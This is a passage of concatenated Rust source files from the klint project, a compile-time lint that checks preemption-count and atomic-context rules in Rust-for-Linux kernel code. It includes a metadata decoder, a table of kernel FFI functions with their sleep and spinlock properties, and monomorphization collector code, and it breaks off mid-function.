        let ty = or_insert_with(self);
        self.type_shorthands.insert(shorthand, ty);
        ty
    }
    /// Temporarily repositions the decoder at `pos` (to follow a shorthand
    /// back-reference), restoring the previous cursor afterwards.
    fn with_position<F, R>(&mut self, pos: usize, f: F) -> R
    where
        F: FnOnce(&mut Self) -> R,
    {
        let new_opaque = self.decoder.split_at(pos);
        let old_opaque = std::mem::replace(&mut self.decoder, new_opaque);
        let r = f(self);
        self.decoder = old_opaque;
        r
    }
    fn decode_alloc_id(&mut self) -> rustc_middle::mir::interpret::AllocId {
        // Clone the `Arc` so the decoding session can borrow `self` mutably.
        let state = self.alloc_decoding_state.clone();
        state.new_decoding_session().decode_alloc_id(self)
    }
}
impl<'a, 'tcx> SpanDecoder for DecodeContext<'a, 'tcx> {
    fn decode_crate_num(&mut self) -> CrateNum {
        let id = StableCrateId::decode(self);
        self.tcx.stable_crate_id_to_crate_num(id)
    }
    /// Inverse of `EncodeContext::encode_span`; dispatches on the tag byte.
    fn decode_span(&mut self) -> Span {
        let tag = u8::decode(self);
        match tag {
            TAG_FULL_SPAN => {
                let stable_source_file_id = StableSourceFileId::decode(self);
                let lo = BytePos::decode(self);
                let hi = BytePos::decode(self);
                match self
                    .tcx
                    .sess
                    .source_map()
                    .source_file_by_stable_id(stable_source_file_id)
                {
                    // Positions were encoded relative to the file start;
                    // rebase them onto this session's file offsets.
                    Some(v) => Span::new(
                        lo + v.start_pos,
                        hi + v.start_pos,
                        SyntaxContext::root(),
                        None,
                    ),
                    None => {
                        // The referenced file is unavailable in this session;
                        // fall back to the caller-provided replacement span.
                        info!("cannot load source file {:?}", stable_source_file_id);
                        self.replacement_span
                    }
                }
            }
            TAG_RELATIVE_SPAN => {
                let lo = BytePos::decode(self);
                let hi = BytePos::decode(self);
                Span::new(
                    lo + self.relative_file.start_pos,
                    hi + self.relative_file.start_pos,
                    SyntaxContext::root(),
                    None,
                )
            }
            TAG_PARTIAL_SPAN => DUMMY_SP,
            _ => unreachable!(),
        }
    }
    // Hygiene data and attribute ids are never produced by the encoder.
    fn decode_expn_id(&mut self) -> rustc_span::ExpnId {
        unreachable!();
    }
    fn decode_syntax_context(&mut self) -> SyntaxContext {
        unreachable!();
    }
    fn decode_def_id(&mut self) -> DefId {
        DefId {
            krate: Decodable::decode(self),
            index: Decodable::decode(self),
        }
    }
    fn decode_attr_id(&mut self) -> rustc_span::AttrId {
        unreachable!();
    }
}
impl<'a, 'tcx> BlobDecoder for DecodeContext<'a, 'tcx> {
    // Symbols were stored as plain strings; re-intern them on decode.
    fn decode_symbol(&mut self) -> Symbol {
        Symbol::intern(self.read_str())
    }
    fn decode_byte_symbol(&mut self) -> ByteSymbol {
        ByteSymbol::intern(self.read_byte_str())
    }
    fn decode_def_index(&mut self) -> DefIndex {
        DefIndex::from_u32(self.read_u32())
    }
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/atomic_context.rs | src/atomic_context.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_hir::def_id::LocalDefId;
use rustc_lint::{LateContext, LateLintPass};
use rustc_middle::mir::mono::MonoItem;
use rustc_middle::ty::{GenericArgs, Instance, TyCtxt, TypingEnv};
use rustc_session::{declare_tool_lint, impl_lint_pass};
use rustc_span::Span;
use crate::ctxt::AnalysisCtxt;
use crate::preempt_count::*;
// A description of how atomic context analysis works.
//
// This analysis can be treated as checking the preemption count, except that the check is
// performed at compile time and the checking is not disabled when compiling a non-preemptible
// kernel.
//
// We assign all functions two properties, one is the current preemption count that it expects,
// and another is the adjustment to the preemption count that it will make. For example, the majority
// of functions would have an adjustment of zero, and either makes no expectation to the preemption
// count or requires it to be zero. Taking a spinlock would have an adjustment of 1, and releasing a
// spinlock would have an adjustment of -1.
//
// In the ideal world all of these properties can be inferred from the source code, however it obviously
// is not practical. The difficulty (apart from some complex control flow) arises from:
// * Rust calls into C functions
// * C calls into Rust functions
// * Indirect function calls
// * Generic functions
// * Recursion
//
// Generic functions are tricky because it makes it impossible for us to assign the properties to a
// generic function. For example, in the following code
// ```
// fn foo<T, F: FnOnce() -> T>(f: F) -> T {
// f()
// }
// ```
// the property of `foo` depends on `F`. If `F` takes a spinlock, e.g. `let guard = foo(|| spinlock.lock())`,
// then `foo` will have an adjustment of 1. But `F` could well be a no-op function and thus `foo` should
// have an adjustment of 0. One way around this would be to work with monomorphized function only, but that
// can require a lot of redundant checking since most functions should have a fixed context property regardless
// of the type parameters. The solution to the generic function would be to try infer the properties of a function
// without generic parameters substituted, and then if the check fails or encountered a type parameter (like `F`
// in the example above), we would bail out and try to re-check the function with substituted type parameters.
//
// The first three categories are more fundamental, because the indirection or FFI makes us unable to infer
// properties in the compile-time. We would therefore have to make some assumptions: all functions are considered
// to make no adjustments to the preemption count, and all functions have no expectations on the preemption count.
// If the functions do not satisfy the expectation, then escape hatch or manual annotation would be required.
// This assumption also means that when a function pointer is *created*, it must also satisfy the assumption.
// Similarly, as using traits with dynamic dispatch is also indirection, we would require explicit markings on
// trait method signatures.
//
// Now finally, recursion. If we want to properly handle recursion, then we are effectively going to find a fixed
// point globally in a call graph. This is not very practical, so we would instead require explicit markings on
// these recursive functions, and if unmarked, assume these functions to make no adjustments to the preemption
// count and have no expectations on the preemption count.
// The single deny-by-default lint this tool emits when preemption-count
// expectations are violated. The description is empty; diagnostics are
// presumably constructed with their own messages elsewhere — TODO confirm.
declare_tool_lint! {
    pub klint::ATOMIC_CONTEXT,
    Deny,
    ""
}
// Each property is an `(adjustment, expectation)` pair: how a call changes
// the preemption count, and what count range it requires on entry.
/// Default assumed when *calling* an unknown FFI function: no adjustment,
/// preemption count must be 0.
pub const FFI_USE_DEFAULT: (i32, ExpectationRange) = (0, ExpectationRange::single_value(0));
/// Default assumed for Rust functions *exposed* over FFI: no adjustment, no
/// expectation on the preemption count.
pub const FFI_DEF_DEFAULT: (i32, ExpectationRange) = (0, ExpectationRange::top());
/// Default assumed for indirect calls through function pointers.
pub const INDIRECT_DEFAULT: (i32, ExpectationRange) = (0, ExpectationRange::single_value(0));
/// Default assumed for drops invoked through dynamic dispatch.
pub const VDROP_DEFAULT: (i32, ExpectationRange) = (0, ExpectationRange::single_value(0));
/// Default assumed for trait-object method calls.
pub const VCALL_DEFAULT: (i32, ExpectationRange) = (0, ExpectationRange::single_value(0));
impl<'tcx> AnalysisCtxt<'tcx> {
    /// Looks up the `(adjustment, expectation)` preemption-count property of
    /// a function crossing the FFI boundary, keyed by its symbol name.
    ///
    /// Returns `None` (after logging a warning) for symbols not in the table;
    /// callers then fall back to the crate-level defaults.
    pub fn ffi_property(&self, instance: Instance<'tcx>) -> Option<(i32, ExpectationRange)> {
        // Callable in any context; no adjustment.
        const NO_ASSUMPTION: (i32, ExpectationRange) = (0, ExpectationRange::top());
        // Requires preemption count 0, i.e. a context that may sleep.
        const MIGHT_SLEEP: (i32, ExpectationRange) = (0, ExpectationRange::single_value(0));
        // Increments the preemption count by one (lock acquisition).
        const SPIN_LOCK: (i32, ExpectationRange) = (1, ExpectationRange::top());
        // Decrements the preemption count; requires it to be at least 1.
        const SPIN_UNLOCK: (i32, ExpectationRange) = (-1, ExpectationRange { lo: 1, hi: None });
        // Same value as NO_ASSUMPTION; the distinct name documents that the
        // function takes and releases a spinlock internally.
        const USE_SPINLOCK: (i32, ExpectationRange) = (0, ExpectationRange::top());
        let mut symbol = self.symbol_name(instance).name;
        // Skip LLVM intrinsics
        if symbol.starts_with("llvm.") {
            return Some(NO_ASSUMPTION);
        }
        // Handle Rust mangled symbols.
        if symbol.starts_with("_RN") {
            return Some(match symbol {
                // Memory allocation glue depended on by liballoc.
                // Allocation functions may sleep.
                f if f.ends_with("__rust_alloc")
                    || f.ends_with("__rust_alloc_zeroed")
                    || f.ends_with("__rust_realloc") =>
                {
                    MIGHT_SLEEP
                }
                // Deallocation function will not sleep.
                f if f.ends_with("__rust_dealloc") => USE_SPINLOCK,
                // Interfacing between libcore and panic runtime
                f if f.ends_with("rust_begin_unwind") => NO_ASSUMPTION,
                // Just an unstable marker.
                f if f.ends_with("__rust_no_alloc_shim_is_unstable_v2") => NO_ASSUMPTION,
                _ => {
                    warn!("Unable to determine property for FFI function `{}`", symbol);
                    return None;
                }
            });
        }
        // Skip helpers.
        if symbol.starts_with("rust_helper_") {
            symbol = &symbol["rust_helper_".len()..];
        }
        // If the name starts with `__` and ends with `_init` or `_exit` then it's the generated
        // init/exit function for a module. These are sleepable.
        if symbol.starts_with("__") && (symbol.ends_with("_init") || symbol.ends_with("_exit")) {
            return Some(MIGHT_SLEEP);
        }
        if symbol.starts_with("rust_doctest_") {
            return Some(MIGHT_SLEEP);
        }
        // Table of known kernel / compiler-runtime symbols, grouped by the
        // kernel header that declares them.
        Some(match symbol {
            // Basic string operations depended on by libcore.
            "memcmp" | "strlen" | "memchr" => NO_ASSUMPTION,
            // Compiler-builtins
            "__eqsf2" | "__gesf2" | "__lesf2" | "__nesf2" | "__unordsf2" | "__unorddf2"
            | "__ashrti3" | "__muloti4" | "__multi3" | "__ashlti3" | "__lshrti3"
            | "__udivmodti4" | "__udivti3" | "__umodti3" | "__aeabi_fcmpeq" | "__aeabi_fcmpun"
            | "__aeabi_dcmpun" | "__aeabi_uldivmod" => NO_ASSUMPTION,
            // `init_module` and `cleanup_module` exposed from Rust modules are allowed to sleep.
            "init_module" | "cleanup_module" => MIGHT_SLEEP,
            // FFI functions defined in C
            // bug.h
            "BUG" => NO_ASSUMPTION,
            "rust_build_error" => NO_ASSUMPTION,
            // cdev.h
            "cdev_alloc" | "cdev_add" | "cdev_del" => MIGHT_SLEEP,
            // clk.h
            "clk_get_rate"
            | "clk_prepare_enable"
            | "clk_disable_unprepare"
            | "clk_get"
            | "clk_put" => MIGHT_SLEEP,
            // current.h
            "get_current" => NO_ASSUMPTION,
            // delay.h
            "msleep" => MIGHT_SLEEP,
            // device.h
            "dev_name" => NO_ASSUMPTION,
            // err.h
            "IS_ERR" | "PTR_ERR" | "errname" => NO_ASSUMPTION,
            // fs.h
            "alloc_chrdev_region" | "unregister_chrdev_region" => MIGHT_SLEEP,
            // fs_parser.h
            "fs_param_is_bool" | "fs_param_is_enum" | "fs_param_is_s32" | "fs_param_is_string"
            | "fs_param_is_u32" | "fs_param_is_u64" => NO_ASSUMPTION,
            // gfp.h
            "__free_pages" => USE_SPINLOCK,
            // io.h
            // I/O functions do not sleep.
            "readb" | "readw" | "readl" | "readq" | "readb_relaxed" | "readw_relaxed"
            | "readl_relaxed" | "readq_relaxed" | "writeb" | "writew" | "writel" | "writeq"
            | "writeb_relaxed" | "writew_relaxed" | "writel_relaxed" | "writeq_relaxed"
            | "memcpy_fromio" => NO_ASSUMPTION,
            "ioremap" | "iounmap" => MIGHT_SLEEP,
            // irq.h
            "handle_level_irq" | "handle_edge_irq" | "handle_bad_irq" => NO_ASSUMPTION,
            // jiffies.h
            "__msecs_to_jiffies" => NO_ASSUMPTION,
            // kernel.h
            "__cant_sleep" => (0, ExpectationRange { lo: 1, hi: None }),
            "__might_sleep" => MIGHT_SLEEP,
            // list_lru.h
            "list_lru_add" | "list_lru_add_obj" | "list_lru_del_obj" | "list_lru_walk" => {
                USE_SPINLOCK
            }
            "list_lru_count" => NO_ASSUMPTION,
            // lockdep.h
            "mutex_assert_is_held" => NO_ASSUMPTION,
            "spin_assert_is_held" => NO_ASSUMPTION,
            // moduleparam.h
            "kernel_param_lock" => MIGHT_SLEEP,
            "kernel_param_unlock" => MIGHT_SLEEP,
            // mutex.h
            "__mutex_init" => NO_ASSUMPTION,
            "mutex_lock" => MIGHT_SLEEP,
            "mutex_unlock" => MIGHT_SLEEP,
            // printk.h
            // printk can be called from any context.
            "_printk" | "_dev_printk" | "rust_fmt_argument" => NO_ASSUMPTION,
            // property.h
            "fwnode_get_name" | "fwnode_count_parents" | "fwnode_get_name_prefix" => NO_ASSUMPTION,
            "fwnode_handle_get" | "fwnode_get_nth_parent" => NO_ASSUMPTION,
            "fwnode_handle_put" => USE_SPINLOCK,
            // random.h
            "wait_for_random_bytes" => MIGHT_SLEEP,
            // rbtree.h
            "rb_insert_color" | "rb_erase" | "rb_next" | "rb_prev" | "rb_first" | "rb_last"
            | "rb_first_postorder" | "rb_next_postorder" | "rb_replace_node" | "rb_link_node" => {
                NO_ASSUMPTION
            }
            // rcupdate.h
            "rcu_read_lock" => SPIN_LOCK,
            "rcu_read_unlock" => SPIN_UNLOCK,
            "synchronize_rcu" => MIGHT_SLEEP,
            // refcount.h
            "REFCOUNT_INIT" | "refcount_inc" | "refcount_dec_and_test" => NO_ASSUMPTION,
            // rwsem.h
            "__init_rwsem" => NO_ASSUMPTION,
            "down_read" | "down_write" => MIGHT_SLEEP,
            "up_read" | "up_write" => MIGHT_SLEEP,
            // sched.h
            "schedule" => MIGHT_SLEEP,
            // sched/signal.h
            "signal_pending" => NO_ASSUMPTION,
            // seq_file.h
            "seq_printf" => NO_ASSUMPTION,
            // slab.h
            // What krealloc does depend on flags. Assume it may sleep for conservative purpose.
            "krealloc" => MIGHT_SLEEP,
            "kfree" => USE_SPINLOCK,
            "slab_is_available" => NO_ASSUMPTION,
            // spinlock.h
            "__spin_lock_init" | "_raw_spin_lock_init" => NO_ASSUMPTION,
            "spin_lock" | "spin_lock_irqsave" | "raw_spin_lock" | "raw_spin_lock_irqsave" => {
                SPIN_LOCK
            }
            "spin_unlock"
            | "spin_unlock_irqrestore"
            | "raw_spin_unlock"
            | "raw_spin_unlock_irqrestore" => SPIN_UNLOCK,
            // timekeeping.h
            "ktime_get" => NO_ASSUMPTION,
            // uaccess.h
            // Userspace memory access might fault, and thus sleep.
            "copy_from_user" | "copy_to_user" | "clear_user" | "copy_from_iter"
            | "copy_to_iter" | "iov_iter_zero" => MIGHT_SLEEP,
            // wait.h
            "init_wait" => NO_ASSUMPTION,
            "prepare_to_wait_exclusive" | "finish_wait" => USE_SPINLOCK,
            "init_waitqueue_func_entry" => NO_ASSUMPTION,
            "add_wait_queue" | "remove_wait_queue" => USE_SPINLOCK,
            // workqueue.h
            "__INIT_WORK_WITH_KEY" | "queue_work_on" => NO_ASSUMPTION,
            "destroy_workqueue" => MIGHT_SLEEP,
            f if f.starts_with("rust_do_trace") => NO_ASSUMPTION,
            _ => {
                warn!("Unable to determine property for FFI function `{}`", symbol);
                return None;
            }
        })
    }
}
/// Lint pass state: wraps the shared [`AnalysisCtxt`] that caches
/// preemption-count analysis results.
pub struct AtomicContext<'tcx> {
    pub cx: &'tcx AnalysisCtxt<'tcx>,
}
// Registers the pass and associates it with the `ATOMIC_CONTEXT` lint.
impl_lint_pass!(AtomicContext<'_> => [ATOMIC_CONTEXT]);
impl<'tcx> AtomicContext<'tcx> {
    /// Whether the crate being compiled is a proc-macro crate.
    ///
    /// Proc-macro crates execute at build time on the host, so the kernel
    /// preemption-count analysis does not apply and all checks are skipped.
    /// (Previously this check was duplicated in all three pass methods.)
    fn is_proc_macro_crate(&self) -> bool {
        self.cx
            .crate_types()
            .contains(&rustc_session::config::CrateType::ProcMacro)
    }
}
impl<'tcx> LateLintPass<'tcx> for AtomicContext<'tcx> {
    /// Pre-pass over the whole crate: persist the preemption-count
    /// annotations of every function and every ADT/trait, so that later
    /// queries (including from dependent crates) can read them.
    fn check_crate(&mut self, _: &LateContext<'tcx>) {
        // Skip checks for proc-macro crates.
        if self.is_proc_macro_crate() {
            return;
        }
        use rustc_hir::intravisit as hir_visit;
        use rustc_hir::*;
        /// HIR visitor invoking one callback per function-like item and
        /// another per ADT (or trait) definition.
        struct FnAdtVisitor<'tcx, F, A> {
            tcx: TyCtxt<'tcx>,
            fn_callback: F,
            adt_callback: A,
        }
        impl<'tcx, F, A> hir_visit::Visitor<'tcx> for FnAdtVisitor<'tcx, F, A>
        where
            F: FnMut(LocalDefId),
            A: FnMut(LocalDefId),
        {
            type NestedFilter = rustc_middle::hir::nested_filter::All;
            /// Because lints are scoped lexically, we want to walk nested
            /// items in the context of the outer item, so enable
            /// deep-walking.
            fn maybe_tcx(&mut self) -> Self::MaybeTyCtxt {
                self.tcx
            }
            fn visit_item(&mut self, i: &'tcx Item<'tcx>) {
                match i.kind {
                    ItemKind::Struct(..) | ItemKind::Union(..) | ItemKind::Enum(..) => {
                        (self.adt_callback)(i.item_id().owner_id.def_id);
                    }
                    ItemKind::Trait(..) => {
                        // Not exactly an ADT, but we want to track drop_preempt_count on traits as well.
                        (self.adt_callback)(i.item_id().owner_id.def_id);
                    }
                    _ => (),
                }
                hir_visit::walk_item(self, i);
            }
            fn visit_foreign_item(&mut self, i: &'tcx ForeignItem<'tcx>) {
                match i.kind {
                    ForeignItemKind::Fn(..) => {
                        (self.fn_callback)(i.owner_id.def_id);
                    }
                    _ => (),
                }
                hir_visit::walk_foreign_item(self, i);
            }
            fn visit_trait_item(&mut self, ti: &'tcx TraitItem<'tcx>) {
                match ti.kind {
                    // Required methods have no body, so `visit_fn` will not
                    // see them; register them here.
                    TraitItemKind::Fn(_, TraitFn::Required(_)) => {
                        (self.fn_callback)(ti.owner_id.def_id);
                    }
                    _ => (),
                }
                hir_visit::walk_trait_item(self, ti)
            }
            fn visit_fn(
                &mut self,
                fk: hir_visit::FnKind<'tcx>,
                fd: &'tcx FnDecl<'tcx>,
                b: BodyId,
                _: Span,
                id: LocalDefId,
            ) {
                (self.fn_callback)(id);
                hir_visit::walk_fn(self, fk, fd, b, id)
            }
        }
        // Do this before the lint pass to ensure that errors, if any, are nicely sorted.
        self.cx
            .hir_visit_all_item_likes_in_crate(&mut FnAdtVisitor {
                tcx: self.cx.tcx,
                fn_callback: |def_id: LocalDefId| {
                    let annotation = self.cx.preemption_count_annotation(def_id.into());
                    self.cx
                        .sql_store::<crate::preempt_count::annotation::preemption_count_annotation>(
                            def_id.into(), annotation,
                        );
                },
                adt_callback: |def_id: LocalDefId| {
                    let annotation = self.cx.drop_preemption_count_annotation(def_id.into());
                    self.cx
                        .sql_store::<crate::preempt_count::annotation::drop_preemption_count_annotation>(
                            def_id.into(), annotation,
                        );
                },
            });
    }
    /// Checks a single function generically (identity substitutions).
    ///
    /// The query results are discarded here: the queries are run for their
    /// caching and diagnostic side effects.
    fn check_fn(
        &mut self,
        cx: &LateContext<'tcx>,
        _: rustc_hir::intravisit::FnKind<'tcx>,
        _: &'tcx rustc_hir::FnDecl<'tcx>,
        _body: &'tcx rustc_hir::Body<'tcx>,
        _: rustc_span::Span,
        def_id: LocalDefId,
    ) {
        // Skip checks for proc-macro crates.
        if self.is_proc_macro_crate() {
            return;
        }
        // Building MIR for `fn`s with unsatisfiable preds results in ICE.
        if crate::util::fn_has_unsatisfiable_preds(cx, def_id.to_def_id()) {
            return;
        }
        let identity = cx
            .tcx
            .erase_and_anonymize_regions(GenericArgs::identity_for_item(self.cx.tcx, def_id));
        let instance = Instance::new_raw(def_id.into(), identity);
        let poly_instance = TypingEnv::post_analysis(self.cx.tcx, def_id).as_query_input(instance);
        let _ = self.cx.instance_adjustment(poly_instance);
        let _ = self.cx.instance_expectation(poly_instance);
        let _ = self.cx.instance_check(poly_instance);
    }
    /// After the generic pass, eagerly monomorphize the crate and re-check
    /// every instantiated function, then persist the encoded MIR.
    fn check_crate_post(&mut self, cx: &LateContext<'tcx>) {
        // Skip checks for proc-macro crates.
        if self.is_proc_macro_crate() {
            return;
        }
        let mono_items = super::monomorphize_collector::collect_crate_mono_items(
            cx.tcx,
            crate::monomorphize_collector::MonoItemCollectionStrategy::Eager,
        )
        .0;
        for mono_item in mono_items {
            if let MonoItem::Fn(instance) = mono_item {
                let poly_instance = TypingEnv::fully_monomorphized().as_query_input(instance);
                // Fully monomorphized instances can never fail with
                // `TooGeneric`; treat that as a compiler bug.
                if let Err(Error::TooGeneric) = self.cx.instance_adjustment(poly_instance) {
                    bug!("monomorphized function should not be too generic");
                }
                if let Err(Error::TooGeneric) = self.cx.instance_expectation(poly_instance) {
                    bug!("monomorphized function should not be too generic");
                }
            }
        }
        self.cx.encode_mir();
    }
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/lattice.rs | src/lattice.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
/// A [partially ordered set][poset] that has a [greatest lower bound][glb] for any pair of
/// elements in the set.
///
/// Dataflow analyses only require that their domains implement [`JoinSemiLattice`], not
/// `MeetSemiLattice`. However, types that will be used as dataflow domains should implement both
/// so that they can be used with [`Dual`].
///
/// [glb]: https://en.wikipedia.org/wiki/Infimum_and_supremum
/// [poset]: https://en.wikipedia.org/wiki/Partially_ordered_set
pub trait MeetSemiLattice: Eq {
    /// Computes the greatest lower bound of two elements, storing the result in `self` and
    /// returning `true` if `self` has changed.
    ///
    /// The lattice meet operator is abbreviated as `∧`.
    ///
    /// The `bool` return value lets fixpoint iteration detect when no further
    /// change is possible.
    fn meet(&mut self, other: &Self) -> bool;
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/monomorphize_collector.rs | src/monomorphize_collector.rs | // Copyright The Rust Project Developers.
// Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
// This module is from rustc_monomorphize/collector.rs, modified so that
// * All uses are collected, including those that should not be codegen-ed locally.
// * `inlines` field is removed from `InliningMap`.
// * Due to the above reasons, `InliningMap` is renamed to `AccessMap`.
// * `Spanned<MonoItem>` is returned in `AccessMap` instead of just `MonoItem`.
use rustc_data_structures::fx::{FxHashMap, FxIndexMap};
use rustc_data_structures::sync::{MTLock, par_for_each_in};
use rustc_data_structures::unord::UnordSet;
use rustc_hir as hir;
use rustc_hir::attrs::InlineAttr;
use rustc_hir::def::DefKind;
use rustc_hir::def_id::{DefId, DefIdMap, LocalDefId};
use rustc_hir::lang_items::LangItem;
use rustc_hir::limit::Limit;
use rustc_middle::middle::codegen_fn_attrs::CodegenFnAttrFlags;
use rustc_middle::mir::interpret::AllocId;
use rustc_middle::mir::interpret::{ErrorHandled, GlobalAlloc, Scalar};
use rustc_middle::mir::mono::{CollectionMode, MonoItem};
use rustc_middle::mir::visit::Visitor as MirVisitor;
use rustc_middle::mir::{self, Location, MentionedItem, traversal};
use rustc_middle::query::TyCtxtAt;
use rustc_middle::ty::adjustment::{CustomCoerceUnsized, PointerCoercion};
use rustc_middle::ty::layout::ValidityRequirement;
use rustc_middle::ty::{
self, GenericArgs, GenericParamDefKind, Instance, InstanceKind, Ty, TyCtxt, TypeFoldable,
TypeVisitableExt, VtblEntry,
};
use rustc_session::config::{DebugInfo, EntryFnType};
use rustc_span::source_map::{Spanned, dummy_spanned, respan};
use rustc_span::{DUMMY_SP, ErrorGuaranteed, Span};
use rustc_trait_selection::traits;
use std::cell::OnceCell;
// From rustc_monomorphize/errors.rs
/// Note diagnostic emitted when a post-monomorphization error occurs while
/// collecting a mono item.
#[derive(Diagnostic)]
#[diag(klint_monomorphize_encountered_error_while_instantiating)]
struct EncounteredErrorWhileInstantiating<'tcx> {
    #[primary_span]
    pub span: Span,
    /// Kind of the mono item being instantiated, as shown in the message.
    pub kind: &'static str,
    pub instance: Instance<'tcx>,
}
/// Note diagnostic for a post-monomorphization error hit while instantiating
/// a `global_asm!` item.
#[derive(Diagnostic)]
#[diag(klint_monomorphize_encountered_error_while_instantiating_global_asm)]
struct EncounteredErrorWhileInstantiatingGlobalAsm {
    #[primary_span]
    pub span: Span,
}
/// Error emitted when monomorphization recursion exceeds the configured
/// recursion limit (see `check_recursion_limit`).
#[derive(Diagnostic)]
#[diag(klint_monomorphize_recursion_limit)]
struct RecursionLimit<'tcx> {
    #[primary_span]
    pub span: Span,
    pub instance: Instance<'tcx>,
    /// Span of the offending function's definition, shown as a note.
    #[note]
    pub def_span: Span,
    pub def_path_str: String,
}
// From rustc_monomorphize/lib.rs
/// Resolves which user-defined `CoerceUnsized` impl governs the coercion from
/// `source_ty` to `target_ty`, returning its custom coercion kind.
fn custom_coerce_unsize_info<'tcx>(
    tcx: TyCtxtAt<'tcx>,
    typing_env: ty::TypingEnv<'tcx>,
    source_ty: Ty<'tcx>,
    target_ty: Ty<'tcx>,
) -> Result<CustomCoerceUnsized, ErrorGuaranteed> {
    let trait_ref = ty::TraitRef::new(
        tcx.tcx,
        tcx.require_lang_item(LangItem::CoerceUnsized, tcx.span),
        [source_ty, target_ty],
    );
    match tcx.codegen_select_candidate(typing_env.as_query_input(trait_ref)) {
        Ok(traits::ImplSource::UserDefined(traits::ImplSourceUserDefinedData {
            impl_def_id,
            ..
        })) => Ok(tcx.coerce_unsized_info(impl_def_id)?.custom_kind.unwrap()),
        // Any other impl source indicates a compiler invariant violation.
        impl_source => {
            bug!("invalid `CoerceUnsized` impl_source: {:?}", impl_source);
        }
    }
}
/// The state that is shared across the concurrent threads that are doing collection.
///
/// All fields are behind `MTLock` so parallel collection threads can share them.
struct SharedState<'tcx> {
    /// Items that have been or are currently being recursively collected.
    visited: MTLock<UnordSet<MonoItem<'tcx>>>,
    /// Items that have been or are currently being recursively treated as "mentioned", i.e., their
    /// consts are evaluated but nothing is added to the collection.
    mentioned: MTLock<UnordSet<MonoItem<'tcx>>>,
    /// Which items are being used where, for better errors.
    usage_map: MTLock<UsageMap<'tcx>>,
}
/// How aggressively mono items are gathered during collection.
#[derive(PartialEq)]
pub enum MonoItemCollectionStrategy {
    /// Collect every reachable instantiation eagerly.
    Eager,
    /// Collect only items demanded by actual uses.
    Lazy,
}
// DIFF: add span, allow iteration
/// Records, for every mono item, the items it uses together with the span of
/// each use (kept for diagnostics).
pub struct UsageMap<'tcx> {
    // Maps every mono item to the mono items used by it.
    pub used_map: FxHashMap<MonoItem<'tcx>, Vec<Spanned<MonoItem<'tcx>>>>,
}
impl<'tcx> UsageMap<'tcx> {
fn new() -> UsageMap<'tcx> {
UsageMap {
used_map: Default::default(),
}
}
fn record_used<'a>(&mut self, user_item: MonoItem<'tcx>, used_items: &'a MonoItems<'tcx>)
where
'tcx: 'a,
{
assert!(
self.used_map
.insert(user_item, used_items.items().collect())
.is_none()
);
}
// Internally iterate over all items and the things each accesses.
pub fn for_each_item_and_its_used_items<F>(&self, mut f: F)
where
F: FnMut(MonoItem<'tcx>, &[Spanned<MonoItem<'tcx>>]),
{
for (&item, used_item) in &self.used_map {
f(item, used_item);
}
}
}
/// An insertion-ordered set of mono items, each remembering the span of its
/// first insertion.
struct MonoItems<'tcx> {
    // We want a set of MonoItem + Span where trying to re-insert a MonoItem with a different Span
    // is ignored. Map does that, but it looks odd.
    items: FxIndexMap<MonoItem<'tcx>, Span>,
}
impl<'tcx> MonoItems<'tcx> {
fn new() -> Self {
Self {
items: FxIndexMap::default(),
}
}
fn is_empty(&self) -> bool {
self.items.is_empty()
}
fn push(&mut self, item: Spanned<MonoItem<'tcx>>) {
// Insert only if the entry does not exist. A normal insert would stomp the first span that
// got inserted.
self.items.entry(item.node).or_insert(item.span);
}
// DIFF: add span
fn items(&self) -> impl Iterator<Item = Spanned<MonoItem<'tcx>>> {
self.items.iter().map(|(item, span)| respan(*span, *item))
}
}
impl<'tcx> IntoIterator for MonoItems<'tcx> {
    type Item = Spanned<MonoItem<'tcx>>;
    // Impl-trait-in-associated-type hides the concrete map iterator type.
    type IntoIter = impl Iterator<Item = Spanned<MonoItem<'tcx>>>;
    /// Consumes the set, yielding each item with its first-insertion span.
    fn into_iter(self) -> Self::IntoIter {
        self.items
            .into_iter()
            .map(|(item, span)| respan(span, item))
    }
}
impl<'tcx> Extend<Spanned<MonoItem<'tcx>>> for MonoItems<'tcx> {
    /// Pushes every item from `iter`, preserving first-insertion spans.
    fn extend<I>(&mut self, iter: I)
    where
        I: IntoIterator<Item = Spanned<MonoItem<'tcx>>>,
    {
        iter.into_iter().for_each(|spanned| self.push(spanned));
    }
}
/// Seeds recursive collection from a root mono item.
///
/// Roots already present in `state.visited` are skipped; otherwise a fresh
/// recursion-depth map is created and the item is collected as "used".
fn collect_items_root<'tcx>(
    tcx: TyCtxt<'tcx>,
    starting_item: Spanned<MonoItem<'tcx>>,
    state: &SharedState<'tcx>,
    recursion_limit: Limit,
) {
    if !state.visited.lock_mut().insert(starting_item.node) {
        // We've been here already, no need to search again.
        return;
    }
    let mut recursion_depths = DefIdMap::default();
    collect_items_rec(
        tcx,
        starting_item,
        state,
        &mut recursion_depths,
        recursion_limit,
        CollectionMode::UsedItems,
    );
}
/// Collect all monomorphized items reachable from `starting_point`, and emit a note diagnostic if a
/// post-monomorphization error is encountered during a collection step.
///
/// `mode` determines whether we are scanning for [used items][CollectionMode::UsedItems]
/// or [mentioned items][CollectionMode::MentionedItems].
fn collect_items_rec<'tcx>(
tcx: TyCtxt<'tcx>,
starting_item: Spanned<MonoItem<'tcx>>,
state: &SharedState<'tcx>,
recursion_depths: &mut DefIdMap<usize>,
recursion_limit: Limit,
mode: CollectionMode,
) {
let mut used_items = MonoItems::new();
let mut mentioned_items = MonoItems::new();
let recursion_depth_reset;
// Post-monomorphization errors MVP
//
// We can encounter errors while monomorphizing an item, but we don't have a good way of
// showing a complete stack of spans ultimately leading to collecting the erroneous one yet.
// (It's also currently unclear exactly which diagnostics and information would be interesting
